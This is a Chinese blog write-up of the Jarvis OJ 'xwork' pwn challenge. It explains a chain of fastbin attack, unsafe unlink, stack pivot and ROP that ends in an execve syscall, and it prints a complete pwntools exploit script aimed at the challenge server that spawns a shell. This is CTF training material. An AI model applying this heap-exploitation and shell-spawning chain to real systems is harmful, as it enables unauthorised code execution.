jarvis oj pwn xwork writeup

最新推荐文章于 2022-08-08 11:40:02 发布
最新推荐文章于 2022-08-08 11:40:02 发布
阅读量572 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/charlie_heng/article/details/79344425
版权

这题没libc,因此利用起来比较麻烦,而且它还去掉了那些one_gadget

首先漏洞很明显,可以use after free,所以可以进行fastbin attack,但是fastbin attack会检查size,所以只能控制某些地方的内存,但是之后怎么用呢? 想了半天,想出一个比较长的利用链,如果有其他比较简便的方法,欢迎交流!

利用链如下:
fastbin attack -> unsafe unlink -> stack pivot -> rop

首先利用fastbin attack,可以控制某些堆的size和prev size,因此可以进行unsafe unlink
将存order那里的指向自身地址-0x18,这样就可以实现任意内存读写

下一步就是找到栈的地址,然后rop一波

但是因为每次只能写31个字节,长的rop链是写不出了,所以stack pivot一波,然后将那些寄存器设成特定的值,直接rop调用syscall,get shell

payload如下

from pwn import *

#p=process('./xwork')
p=remote('pwn2.jarvisoj.com', 9897)
context.log_level='debug'
#gdb.attach(proc.pidof(p)[0])

def ru(x):
    p.recvuntil(x)

def se(x):
    p.sendline(x)

def add_order(data):
    se('1')
    sleep(0.1)
    p.send(data)
    ru('Exit')

def delete_order(idx):
    se('4')
    ru('index')
    se(str(idx))
    ru('Exit')

def edit_order(idx,order,wait=True):
    se('3')
    ru('index')
    se(str(idx))
    sleep(0.1)
    p.send(order)
    if wait:
        ru('Exit')

def show_order(idx):
    se('2')
    ru('index:')
    se(str(idx))
    sleep(0.1)
    data=p.recv(31)
    ru('Exit')
    return data

def leak(addr):
    edit_order(0,p64(addr))
    data=show_order(1)
    return data

ru('your name:')
p.send('1'*(31-8)+p64(0x31))
ru('Exit')


#--------------------fastbin attack----------------------
add_order(p64(0)+p64(0x51)+p64(0x6CCD60-0x8*3)+p64(0x6CCD60-0x8*2)[:-1])
add_order('1'*25)
add_order('t3')
add_order('t4')
add_order('t5')
delete_order(1)
delete_order(2)
data=show_order(2)#get heap address
print(len(data))
h1=u32(data[:4])


#--------------------unsafe unlink-----------------------
edit_order(2,p64(h1+0x20))
add_order('a')
add_order(p64(0x50)+p64(0x90))
delete_order(2)

edit_order(0,p64(0)+p64(0x6cbb80)+p64(0)+p64(0x6CCD60)[:-1])
edit_order(0,p64(0x6CCD68))
print(hex(h1))

stack=u64(leak(0x6cc638)[8:16])-0x170

stack_p=0x6CCD98
string=0x6CCC60

prdi=0x4018a6
prsi=0x4019c7
pradx=0x4789a6
prbp=0x4004d1
leave=0x400C70
syscall=0x47CD3D


#--------------------stack pivot--------------------
pivot=p64(prbp)+p64(stack_p-0x8)+p64(leave)


#-------------------- rop --------------------------
payload1=p64(prdi)+p64(string+0x8)+p64(prsi)
payload2=p64(0)+p64(pradx)+p64(0x3b)
payload3=p64(0x0)+'/bin//sh'+p64(syscall)

buf=p64(string+0x8)+'/bin//sh'

edit_order(0,p64(string))
edit_order(1,buf)

edit_order(0,p64(stack_p))
edit_order(1,payload1)

edit_order(0,p64(stack_p+0x18))
edit_order(1,payload2)

edit_order(0,p64(stack_p+0x30))
edit_order(1,payload3)

edit_order(0,p64(stack))
edit_order(1,pivot,False)

p.interactive()
charlie_heng
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LibcSearcher报错:no matched libc,please add more libc or try others
qq_40889704的博客
05-09 3532
今天在CTF-wiki上学习缓冲区溢出攻击中的ret2libc 在编写攻击代码时,用到了一个名为LibcSearcher的库,来确定libc中某个函数的地址。 这里先给出库的链接:https://github.com/lieanu/LibcSearcher 但是按照wiki上给出的例子编写好攻击代码,在运行时报错了: no matched libc,please add more libc or try others 大概意思是找不到匹配的libc版本库。 进到LibcSearcher的libc-data
jarvisoj刷题之旅】pwn题目Tell Me Something的writeup
iqiqiya的博客
10-14 990
题目信息: file一下  发现是64位的ELF checksec检查下安全性 objdump -t 文件名   可以查看符号表 iqiqiya@521:~/Desktop/jarvisOJ$ objdump -t guestbook guestbook: file format elf64-x86-64 SYMBOL TABLE: 00000000004002...
jarvis oj pwn calc.exe writeup
charlie_heng的专栏
02-19 472
这题其实难是难在代码比较多,要审计比较长时间 首先checksec,发现没开NX,估计就是要用shellcode了 然后审计了一波,粗略发现了两个漏洞 1. 没有检查calloc出来那几个堆是否满了,有可能会溢出到下一个堆,但是这里用不了,所以不详细说了 2. 使用var ,可以添加add sub等已经存在的函数,从而实现替代了函数功能的作用 这里用的就是第二个漏洞 var add =...
jarvis oj pwn hiphop writeup
charlie_heng的专栏
01-24 362
这题真的感觉挺新颖的 首先说下这题的漏洞是什么 条件竞争! 一开始我看到这题是懵逼的,为什么好像常规的下标越界,缓冲区越界之类的都没有 然后其中一个功能又非常奇怪,要开线程? 然后看到这个函数里面某个地方一大堆sleep,于是就猜是条件竞争了 这题是打boss,然后每次都会随机一下出招,只要能预测出出招是什么就能防御 然后回想起以前打pwnable的一题,也是同样靠本地的时间与服务器
No matched libc, please add more libc or try others
Dem1的博客
05-18 681
在使用libcsearcher库的时候出现报错 弄了很久终于弄好了 打开libcSearcher目录下的libcdatabase #删除libcdatabase里的文件 rm -rf * #重新安装libcdatabase的东西 git clone https://github.com/niklasb/libc-database ./get ubuntu #出现报错Requirements for download or update ‘ubuntu’ are not met. Please, refer
[二进制学习笔记]LibcSearcher报错no matched libc
最新发布
hide_in_darkness的博客
08-08 1139
​ git clone git://github.com/niklasb/libc-database # 重新拖一个库下来。​ 很纳闷,我都已经安装了LibcSearcher,而且在在线查询网上也存在版本号,但是为什么就是没有呢?​ 简单的讲就是如果LibcSearcher默认的库中没有你所需要的版本,那么就需要你手动下载一下了。(1)rm -rf libc-database/* # 删除原有的所有配置文件。​ 查看libc-database文件夹文件夹下面有一个说明MD文档。...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
Jarvis声音.zip
09-28
"Jarvis声音.zip"这个压缩包文件显然与流行的科幻角色——钢铁侠托尼·斯塔克的人工智能助手Jarvis有关。Jarvis,全名Just A Rather Very Intelligent System,是漫威宇宙中的一个标志性元素,其在电影中以其独特、...
pwn jarvis itemboard writeup
charlie_heng的专栏
01-22 600
这题真心坑。。。本地做出来了,但是连上服务器就不行,目测是堆地址中有一个\x00。。。。 这题有几个漏洞 第一个是,没有对new item 的大小做判断,可以越界直接rop 第二个是,delete_note的操作其实并没有用,只free掉了,但是array那里还存着地址,所以就可以uaf 其实这题单纯uaf都可以做出来的,但是rop也可以用上 来说下思路 1. 获取libc地址
jarvisoj pwn inst_prof writeup
charlie_heng的专栏
01-23 723
这题其实是google ctf的一道题 看到的时候完全震惊了。。。4字节shellcode。。。这要怎么弄啊 想了半天想不出,然后看了下别人的wp,又一次被震惊了,还有这种骚操作。。。 在执行shellcode的时候,r14这个寄存器是不变的,所以可以用r14这个寄存器来存一些重要的东西 然后就是怎么get到shell 呢? 我这里来一套别的骚操作,不用别的wp里面的rop 首先先来说
(Jarvis Oj)(Pwn) Tell Me Something
Nothing
06-14 986
(Jarvis Oj)(Pwn) Tell Me Something 首先查看程序开的保护。基本什么都没有。 丢到ida中,主函数。 然后发现了good_game函数。 这个函数的用途就显而易见了,输出目录下的”flag.txt”文件。于是利用read函数导致的栈溢出,将返回地址覆盖为good_game函数的地址。通过ida或者cyclic工具可以获得需要的填充的长度。写得脚本...
CCTF重邮(绿盟)杯_部分解密题WriteUp
焚卷觅光的博客
07-31 5142
CCTF重邮(绿盟)杯_部分解密题0X00   Kungfu解开压缩包,里面就是一个图片(又是那个卖如来神掌的老乞丐),按照脑洞惯例跑Stegsolve。在文件底发现了“key is …..”把它复制出来再说。VF95c0s5XzVyaGtfX3VGTXR9M0Vse251QEUg明显是一个base64加密,放解码器跑出来是这个:T_ysK9_5rhk__uFMt}3El{nu@E 这已经很接近fl
攻防世界 crypto--------easychallenge
weixin_44159598的博客
07-28 2940
我们得到的是一个.pyc文件,我们先来了解一下   一:什么是pyc文件? pyc文件就是 py程序编译后得到的文件,是一种二进制文件。一般是这样的: python中.pyc文件是什么? pyc文件经过python解释器最终会生成机器码运行。所以pyc文件是可以跨平台部署的,类似Java的.class文件。如果py文件改变,也会重新生成pyc文件。 二:pyc文件怎么生成的? 1,被当做模块调用...
i春秋网鼎杯网络安全大赛advanced题目writeup
iqiqiya的博客
10-13 2742
今天打了护网杯 发现啥也不会 悲伤   就想起来了未完成的网鼎杯   来补坑(通过观摩大佬writeup) file命令查看是一个64位的ELF文件    运行后无交互动作   只输出 welcome, here is your identification, please keep it in your pocket: 4b404c4b5648725b445845734c735949405...
libc,glibc和libc关系
CSDN博客
06-04 564
【glibc 和 libc】 glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 ANSI C 和 GNU C 有什么区别呢? ANSI C 函数库是基本的 C 语言函数库,包含了 C 语言最基本的库函数。这个库可以根据头文件划分为 15 个部分,其中包括: <ctype.h>:包含用来测试某个特征字符的函数的函数原型,以及用来转换大小写字母的函数原...
jarvisoj pwn level6 writeup
charlie_heng的专栏
01-21 1717
考完试了,又开始做题 这题是一道很好的用来熟悉堆的题 首先先确定漏洞的地方是delete note 漏洞有两个 1. 没有校验对应的堆是否有free 2. delete完之后没有把指向堆的指针清除 所以可以利用double free,触发unlink,达到任意内存修改的目的 具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值